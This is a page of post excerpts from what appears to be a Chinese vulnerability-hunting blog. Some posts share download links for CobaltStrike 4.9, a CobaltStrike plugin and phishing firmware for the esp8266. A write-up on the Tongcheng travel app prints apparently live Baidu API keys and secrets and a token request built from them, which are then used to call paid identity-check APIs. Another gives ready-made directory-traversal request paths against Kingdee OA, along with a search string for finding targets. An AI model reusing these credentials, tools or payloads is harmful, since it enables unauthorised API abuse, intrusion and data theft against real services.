分类 默认分类 下的文章 - 瓜皮博客_d0glun
首页
关于
搜 索
1
金蝶OA server_file 目录遍历漏洞
11 阅读
2
锐明Crocus系统存在任意用户添加漏洞
10 阅读
3
奥德美生物科技(中山)有限公司登陆系统文件包含漏洞
9 阅读
4
SPIP porte_plume插件 远程代码执行漏洞(CVE-2024-7954)
8 阅读
5
贝壳找房某处越权+Oracle盲注
7 阅读
默认分类
漏洞挖掘思路
漏洞POC
神兵利器
登录
/
注册
搜 索
Typecho
累计撰写
24
篇文章
累计收到
2
条评论
首页
栏目
默认分类
漏洞挖掘思路
漏洞POC
神兵利器
页面
关于
用户登录
登录
注册
找到
13
篇与
相关的结果
2025-06-13
CobaltStrike插件
通过网盘分享的文件:Ladon-master.zip链接: https://pan.baidu.com/s/1iSsNvfasFJkOXAKv2x-9oA 提取码: 1111 --来自百度网盘超级会员v2的分享
2025年06月13日
3 阅读
0 评论
0 点赞
2025-06-13
CobaltStrike 4.9
CobaltStrike 4.9通过网盘分享的文件:CobaltStrike 4.9.zip链接: https://pan.baidu.com/s/1-m2fF1e7-tRBaAVH7DEmWA 提取码: 1111 --来自百度网盘超级会员v2的分享
2025年06月13日
1 阅读
0 评论
0 点赞
2025-06-13
esp8266钓鱼固件
通过网盘分享的文件: esp8266钓fish.zip链接: https://pan.baidu.com/s/1MqJbx0eccjjbSHFYzCdvew 提取码: 1111 --来自百度网盘超级会员v2的分享
2025年06月13日
2 阅读
0 评论
0 点赞
2025-05-20
同程旅行app存在敏感信息泄露
漏洞简述同程旅行app存在敏感信息泄露,攻击者可以通过反编译获得百度token,从而任意调用api付费服务复现步骤下载apphttps://www.wandoujia.com/apps/39733利用工具进行反编译此处泄露百度api<meta-data android:name="com.baidu.speech.APP_ID" android:value="11648787"/> <meta-data android:name="com.baidu.speech.API_KEY" android:value="yD9pMoFcLrra4sdy6KrtDRSs"/> <meta-data android:name="com.baidu.speech.SECRET_KEY" android:value="OrNd5wRs5KZXZUtyxXZWzyd7oS6fjROR"/>利用官方文档进行调用获取access_token https://openapi.baidu.com/oauth/2.0/token?grant_type=client_credentials&client_id=yD9pMoFcLrra4sdy6KrtDRSs&client_secret=OrNd5wRs5KZXZUtyxXZWzyd7oS6fjROR&scope=smartapp_snsapi_base 成功获取到accesstoken值,并且看到此处使用了大量的付费接口于是尝试调用付费接口,利用百度的在线工具https://cloud.baidu.com/apiexplorer/index.html?Product=GWSE-nmhroEsyriA&Api=GWAI-PZVqcHoyUhDheader处填入application/json access_token处填入上面获得的token,body处填入身份证号和对应的姓名,可以看到返回success,证明匹配成功当输入错误的姓名时显示不匹配,并且查询官方文档得知此api接口是付费接口,成功实现接管https://ai.baidu.com/ai-doc/FACE/ek8dz0tl6同样的 此接口也可调用,这里进行测试调用了自己的 https://cloud.baidu.com/apiexplorer/index.html?Product=GWSE-nmhroEsyriA&Api=GWAI-ropk3axeb3W修复方案隐藏敏感信息,并将key全部更换,避免存在已经泄露的潜在危害
2025年05月20日
3 阅读
0 评论
0 点赞
2025-05-20
金蝶OA server_file 目录遍历漏洞
漏洞描述金蝶OA server_file 存在目录遍历漏洞,攻击者通过目录遍历可以获取服务器敏感信息漏洞影响1金蝶OA网络测绘app="Kingdee-EAS"漏洞复现登录界面为漏洞Poc/appmonitor/protected/selector/server_file/files?folder=/&suffix= # Windows服务器 appmonitor/protected/selector/server_file/files?folder=C://&suffix= # Linux服务器 appmonitor/protected/selector/server_file/files?folder=/&suffix=
2025年05月20日
11 阅读
1 评论
0 点赞
1
2
3